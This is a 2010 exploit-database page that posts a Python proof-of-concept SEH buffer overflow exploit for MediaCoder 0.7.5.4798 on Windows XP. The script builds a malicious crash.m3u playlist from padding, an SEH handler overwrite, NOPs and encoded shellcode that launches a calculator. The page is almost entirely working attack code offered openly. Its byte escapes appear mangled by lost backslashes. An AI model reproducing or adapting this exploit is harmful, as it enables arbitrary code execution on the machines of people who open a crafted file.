[local exploits] - MediaCoder-0.7.5.4798.exe 0-days Buffer O

Posted on 24 December 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>MediaCoder-0.7.5.4798.exe 0-days Buffer Overflow | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='MediaCoder-0.7.5.4798.exe 0-days Buffer Overflow by Oh Yaw Theng in local exploits | Inj3ct0r 1337 - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_setDomainName", "none"]);_gaq.push(["_setAllowLinker", true]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre># Exploit Title: MediaCoder-0.7.5.4798.exe 0-days Buffer Overflow Exploit(SEH)
# Date: 24 / 12 / 2010
# Author: Oh Yaw Theng
# Software Link: http://www.mediacoderhq.com/mirrors.htm?file=MediaCoder-0.7.5.4798.exe
# Version: v0.7.5.4798  (Latest Version !!)
# Tested on: Microsoft Windows XP SP2
# CVE : N / A

#!/usr/bin/python

filename = &quot;crash.m3u&quot;

junk = &quot;x41&quot; * 764
handler = &quot;xEBx10x90x90&quot;
pointer = &quot;x3Ex21xD0x63&quot;  # 63D0213E   01612DC5
nops = &quot;x90&quot; * 20

# Pop Up a Calculator !  Ho Ho ! Merry Christmas ! Jingle Bell !
shellcode = (
&quot;xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49&quot;
&quot;x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36&quot;
&quot;x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34&quot;
&quot;x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41&quot;
&quot;x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x44&quot;
&quot;x42x30x42x50x42x30x4bx48x45x54x4ex43x4bx38x4ex47&quot;
&quot;x45x50x4ax57x41x30x4fx4ex4bx58x4fx54x4ax41x4bx38&quot;
&quot;x4fx45x42x42x41x50x4bx4ex49x44x4bx38x46x33x4bx48&quot;
&quot;x41x50x50x4ex41x53x42x4cx49x59x4ex4ax46x58x42x4c&quot;
&quot;x46x57x47x30x41x4cx4cx4cx4dx30x41x30x44x4cx4bx4e&quot;
&quot;x46x4fx4bx53x46x55x46x32x46x50x45x47x45x4ex4bx58&quot;
&quot;x4fx45x46x52x41x50x4bx4ex48x56x4bx58x4ex50x4bx44&quot;
&quot;x4bx48x4fx55x4ex41x41x30x4bx4ex4bx58x4ex41x4bx38&quot;
&quot;x41x50x4bx4ex49x48x4ex45x46x32x46x50x43x4cx41x33&quot;
&quot;x42x4cx46x46x4bx38x42x44x42x53x45x38x42x4cx4ax47&quot;
&quot;x4ex30x4bx48x42x44x4ex50x4bx58x42x37x4ex51x4dx4a&quot;
&quot;x4bx48x4ax36x4ax30x4bx4ex49x50x4bx38x42x58x42x4b&quot;
&quot;x42x50x42x50x42x50x4bx38x4ax36x4ex43x4fx45x41x53&quot;
&quot;x48x4fx42x46x48x35x49x38x4ax4fx43x48x42x4cx4bx57&quot;
&quot;x42x45x4ax36x42x4fx4cx38x46x30x4fx35x4ax46x4ax39&quot;
&quot;x50x4fx4cx38x50x50x47x55x4fx4fx47x4ex43x46x41x46&quot;
&quot;x4ex46x43x36x42x50x5a&quot;)

exploit = junk + handler + pointer + nops + shellcode

textfile = open(filename,&#039;w&#039;)
textfile.write(exploit)
textfile.close()


# <a href='http://1337db.com/'>1337db.com</a> [2010-12-24]</pre></body></html>
TOP
Malware :

Last 20
Exploits :

Last 20